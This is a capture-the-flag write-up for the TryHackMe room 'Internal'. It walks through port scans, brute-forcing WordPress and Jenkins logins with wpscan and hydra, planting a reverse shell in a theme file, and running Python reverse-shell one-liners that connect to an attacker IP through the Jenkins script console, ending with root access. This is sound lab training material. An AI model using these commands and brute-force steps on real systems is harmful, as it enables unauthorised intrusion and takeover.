Internal TryHackMe Writeup

8 minute read

internal

Internal is a hard rated room on TryHackMe by TheMayor. Credential bruteforcing on an wordpress site for an admin user gives us a shell on the box as www-data. On the box, we find credential on a file for another user and there was jenkins running on a docker container whose login credentials were also bruteforced to get a shell on a docker container as user jenkins and at last we get the login credential for root on a file inside docker container.

Port Scan

All Ports

[email protected]:~/Documents/tryhackme/internal$ nmap -p- --min-rate 10000 -oN nmap/all_ports -v 10.10.4.68
Nmap scan report for internal.thm (10.10.124.183)
Host is up (0.38s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
# Nmap done at Mon Nov  9 10:04:44 2020 -- 1 IP address (1 host up) scanned in 35.21 seconds

Detailed Scan

[email protected]:~/Documents/tryhackme/internal$ nmap -p22,80 -sC -sV -oN nmap/detail_scan 10.10.4.68
Nmap scan report for internal.thm (10.10.124.183)
Host is up (0.38s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov  9 10:05:42 2020 -- 1 IP address (1 host up) scanned in 21.43 seconds

Only two ports are open. As there is not much in SSH, let’s start the enumeration with HTTP service on port 80.

Port 80

1

Directory Bruteforcing

[email protected]:~/Documents/tryhackme/internal$ wfuzz -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/raft-medium-directories.txt -c --hc 404 http://10.10.4.68/FUZZ
********************************************************
* Wfuzz 3.0.3 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.4.68/FUZZ
Total requests: 30000
===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                        
===================================================================

000000019:   301        9 L      28 W     311 Ch      "blog"                                                                                                         
000000574:   301        9 L      28 W     316 Ch      "wordpress"                                                                                                    
000001060:   301        9 L      28 W     317 Ch      "javascript"                                                                                                   
000010812:   301        9 L      28 W     317 Ch      "phpmyadmin"                                                                                                   
000095511:   403        9 L      28 W     277 Ch      "server-status"                                                                                                

Looks like there is a wordpress site running and also we can see /phpmyadmin.

Visiting /blog

2

This is a wordpress site. I looked around and did not find that much except a post. As it is a wordpress site, I decided to check the website using wpscan.

Using wpscan to enumerate users

[email protected]:~/Documents/tryhackme/internal$ wpscan --url http://10.10.4.68/blog -e u
_______________________________________________________________
         __          _______   _____                                                    
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                    
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |                                                                                                                          
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
                                                                                        
         WordPress Security Scanner by the WPScan Team
                         Version 3.8.10  
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart    
_______________________________________________________________                                                                                                                 

[+] URL: http://10.10.4.68/blog/ [10.10.4.68]
[+] Started: Sun Nov 29 18:16:40 2020
[i] User(s) Identified:

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

A user admin is found by wpscan. As there was not much on the website, I decided to bruteforce the login credential for the user admin with rockyou.txt wordlist.

Bruteforcing login password for admin using wpscan

[email protected]:~/Documents/tryhackme/internal$ wpscan --url http://10.10.4.68/blog -U admin -P /usr/share/wordlists/rockyou.txt -t 20
_______________________________________________________________
         __          _______   _____                                                    
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                    
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |                                                                                                                          
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
                                                                                        
         WordPress Security Scanner by the WPScan Team
                         Version 3.8.10  
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / <wp-password-redacted>                                                                                                                                                     
Trying admin / winxclub Time: 00:02:54 <                                                                                               > (3900 / 14348292)  0.02%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: <wp-password-redacted>
[+] Finished: Sun Nov 29 18:21:13 2020
[+] Requests Done: 3924
[+] Cached Requests: 26
[+] Data Sent: 1.903 MB
[+] Data Received: 2.299 MB
[+] Memory used: 230.035 MB
[+] Elapsed time: 00:03:03

We find a valid password for user admin. So, let’s login to the wordpress admin dashboard and as I soon as I opened /blog/wp-admin, it redirects us to internal.thm, so lets add this entry to the our /etc/hosts file.

10.10.4.68      internal.thm

Admin Dashboard

3

Looking around there was a private post containing username and credential. I tried to login with the credentials using SSH and phpmyadmin but was unsuccessful. The credentials here turned out to be fake. 4

Getting a shell as www-data

Twenty seventeen theme was active on the wordpress and we can edit the php files using theme editor and put a reverse shell payload to get code execution.

5 So I updated the content of the main index.php with the reverse shell payload and opened up a netcat listener on my box.

Edited index.php

6

And when we try to access the edited page, we get a shell as user www-data.

[email protected]:~/Documents/tryhackme/internal$ nc -nvlp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.4.68 51064
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation

Manual enumeration

As I was manually looking through, I found a file wp-save.txt with login credentials for aubreanna on /opt.

[email protected]:/opt$ ls
containerd  wp-save.txt
[email protected]:/opt$ cat wp-save.txt 
Bill,

Aubreanna needed these credentials for something later.  Let her know you have them and where they are.

aubreanna:<ssh-redacted-creds>

Shell as aubreanna

[email protected]:/opt$ su aubreanna
Password: 
[email protected]:/opt$ id
uid=1000(aubreanna) gid=1000(aubreanna) groups=1000(aubreanna),4(adm),24(cdrom),30(dip),46(plugdev)

aubreanna is a memeber of group adm which means we have can read few extra log files.

Checking Open ports on the box

[email protected]:/opt$ ss -ltn
State                 Recv-Q                  Send-Q                                    Local Address:Port                                    Peer Address:Port                 
LISTEN                0                       128                                       127.0.0.53%lo:53                                           0.0.0.0:*                    
LISTEN                0                       128                                             0.0.0.0:22                                           0.0.0.0:*                    
LISTEN                0                       128                                           127.0.0.1:41501                                        0.0.0.0:*                    
LISTEN                0                       80                                            127.0.0.1:3306                                         0.0.0.0:*                    
LISTEN                0                       128                                           127.0.0.1:8080                                         0.0.0.0:*                    
LISTEN                0                       128                                                [::]:22                                              [::]:*                    
LISTEN                0                       128                                                   *:80                                                 *:*                    
[email protected]:/opt$ 

There are few ports that are listening on the local interface which were not visible on our nmap scan.

Checking the service on Port 8080

[email protected]:/opt$ curl localhost:8080
<html><head><meta http-equiv='refresh' content='1;url=/login?from=%2F'/><script>window.location.replace('/login?from=%2F');</script></head><body style='background-color:white; color:white;'>


Authentication required
<!--
You are authenticated as: anonymous
Groups that you are in:
  
Permission you need to have (but didn't): hudson.model.Hudson.Read
 ... which is implied by: hudson.security.Permission.GenericRead
 ... which is implied by: hudson.model.Hudson.Administer
-->

</body></html>                                                                                                                                                                  

HTTP service is running on port 8080.

Checking runnning docker processes

[email protected]:/opt$ ps -ef | grep -i docker
root       911     1  0 12:23 ?        00:00:00 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root      1449   911  0 12:23 ?        00:00:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8080 -container-ip 172.17.0.2 -container-port 8080

Looking at the process list, we can see that port 8080 of the host is mapped to the docker’s port 8080.

SSH tunneling

As the port is only accessible to local interface, I used SSH tunneling to tunnel the traffic in order to access the HTTP service locally from my box.

[email protected]:~/Documents/tryhackme/internal$ ssh -N -L 8080:localhost:8080 [email protected]
Warning: Permanently added the ECDSA host key for IP address '10.10.4.68' to the list of known hosts.
[email protected]'s password: 

And if we check the open ports on our local device, port 8080 is listening for connection.

local[email protected]:~/Documents/tryhackme/internal$ ss -tln | grep 8080
LISTEN   0        128            127.0.0.1:8080          0.0.0.0:*              
LISTEN   0        128                [::1]:8080             [::]:*

Port 8080

7 Jenkins is running on port 8080. I tried to login using default credentials for jenkins admin:password, but that didnot work. I also tried logging with the few credentials I had obtained till now, that did not work either.

Bruteforcing login for jenkins using hydra

[email protected]:~/Documents/tryhackme/internal$ hydra -l admin -P /usr/share/wordlists/SecLists-master/Passwords/Leaked-Databases/rockyou-35.txt 127.0.0.1 http-post-form '/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:loginError' -I -s 8080
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-29 19:25:45
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2506 login tries (l:1/p:2506), ~157 tries per task
[DATA] attacking http-post-form://127.0.0.1:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:loginError
[8080][http-post-form] host: 127.0.0.1   login: admin   password: <jenkins-redacted-creds>
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-29 19:26:08

And we get login credential for user admin. So, let’s use the credentials to log into the jenkins dashboard. 8

We can use script console on jenkins to execute code on the host. 9

Code Execution on the container

10 We are running as user jenkins on the container.

Reverse shell as user jenkins

Lets replace the command variable with the contents of the reverse shell and open up our netcat listener. There was no netcat on the container but it has python and it was erroring out due to the cause of so many quotes, so I hosted a file called shell.sh on my local box, and downloaded the file on the container in first step and executed the file on the second step.

Contents of shell.sh

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.6.31.213",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.6.31.213",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

11 And we get a connection back on our netcat listener.

[email protected]:~/Documents/tryhackme/internal$ nc -nvlp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.4.68 52578
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)

As I was manually looking around on the host, I found a file with credentials on /opt.

[email protected]:/home$ ls -la /opt
total 12
drwxr-xr-x 1 root root 4096 Aug  3 03:31 .
drwxr-xr-x 1 root root 4096 Aug  3 03:07 ..
-rw-r--r-- 1 root root  204 Aug  3 03:31 note.txt
[email protected]:/home$ cat /opt/note.txt
Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you 
need access to the root user account.

root:<root-redacted_creds>

So, I tried to login on the host box as root with the creds above using SSH and we login.

[email protected]:~/Documents/tryhackme/internal$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Nov 29 14:01:31 UTC 2020

  System load:  0.0               Processes:              123
  Usage of /:   63.7% of 8.79GB   Users logged in:        0
  Memory usage: 43%               IP address for eth0:    10.10.4.68
  Swap usage:   0%                IP address for docker0: 172.17.0.1

  => There is 1 zombie process.


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Aug  3 19:59:17 2020 from 10.6.2.56
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)

Reading root flag

[email protected]:~# cat root.txt 
THM{d***r_d******r}